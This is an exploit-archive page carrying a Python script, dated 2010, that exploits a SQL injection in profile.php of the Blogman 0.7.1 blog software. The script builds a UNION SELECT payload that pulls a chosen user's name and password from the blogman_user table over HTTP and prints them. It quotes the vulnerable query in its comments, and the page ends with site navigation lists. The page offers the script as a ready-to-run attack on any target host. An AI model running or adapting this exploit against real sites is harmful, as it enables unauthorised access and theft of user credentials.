Blogman 0.7.1 SQL Injection

Blogman 0.7.1 SQL Injection: Posted Aug 30, 2010; Authored by Ptrace Security; Blogman version 0.7.1 suffers from a remote SQL injection vulnerability in profile.php.; tags | exploit, remote, php, sql injection; SHA-256 | 135e2bf1f74d12fe3131e0915467b8bda02fda76b726fbca0ca94246a96a1776; Download | Favorite | View

Blogman 0.7.1 SQL Injection

#!/usr/bin/python
#
# Exploit Title:   Blogman v0.7.1 (profile.php) SQL Injection Exploit
# Date         :   28 August 2010
# Author       :   Ptrace Security (Gianni Gnesa [gnix])
# Contact      :   research[at]ptrace-security[dot]com
# Software Link:   http://sourceforge.net/projects/blogman/
# Version      :   0.7.1
# Tested on    :   EasyPHP 5.3.1.0 for Windows
#
#
# Description
# ===========
#
# + profile.php => SQL Injection!!
#
# 6:    $query = "SELECT * FROM ".$GLOBALS['dbTablePrefix']."user WHERE
#       UserID='".$_GET['id']."'";
# 7:    $profileuser = mysql_fetch_array(mysql_query($query));
#
# + profile.php => The query showed above returns a 16-columns table. UserName,
#   which is the 2nd column's name, is used few line after the query to display
#   the information extracted.
#
# 12:   echo $profileuser['UserName']."</p>\n";
#
 
import re
import sys
import http.client
import urllib.parse
 
 
def usage(prog):
    print('Usage  : ' + prog + ' <target> <path> <user_id>\n')
    print('Example: ' + prog + ' localhost /blogman/ 2')
    print('         ' + prog + ' www.example.com /complete/path/ 1')
    return
 
 
def exploit(target, path, userid):
    payload  = 'profile.php?id=-1%27%20UNION%20SELECT%20NULL,%20CONCAT(%27%3C1'
    payload += '%3E%27,UserName,%27:%27,UserPassword,%27%3C2%3E%27),%20NULL,%20'
    payload += 'NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,'
    payload += '%20NULL,%20NULL,%20NULL,%20NULL,%20NULL%20FROM%20blogman_user'
    payload += '%20WHERE%20UserID=%27' + str(userid) + '%27%20--%20%27'
 
    print('[+] Sending HTTP Request')
    con = http.client.HTTPConnection(target)
    con.request('GET', path + payload)
    res = con.getresponse()
     
    if res.status != 200:
        print('[!] HTTP GET request failed.')
        exit(1)
 
    print('[+] Parsing HTTP Response')
    data = res.read().decode()
    pattern = re.compile(r"<1>(.+?)<2>", re.M)
    m = pattern.search(data)
 
    if m:
        print('[+] Information Extracted:\n')
        print(m.group()[3:-3])
    else:
        print('[!] No information found')
         
    return
 
 
print('\n+-----------------------------------------------------------------------+')
print('| Blogman v0.7.1 (profile.php) SQL Injection Exploit by Ptrace Security |')
print('+-----------------------------------------------------------------------+\n')
 
if len(sys.argv) != 4:
    usage(sys.argv[0])
else:
    exploit(sys.argv[1], sys.argv[2], sys.argv[3])
 
exit(0)

Top Authors In Last 30 Days

Red Hat 229 files
indoushka 167 files
Jay Turla 150 files
Ubuntu 67 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,124)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,237)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,845)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,852)
UNIX (9,456)
UnixWare (188)
Windows (6,772)
Other

Blogman 0.7.1 SQL Injection

Blogman 0.7.1 SQL Injection

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Blogman 0.7.1 SQL Injection

Share This

Blogman 0.7.1 SQL Injection

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems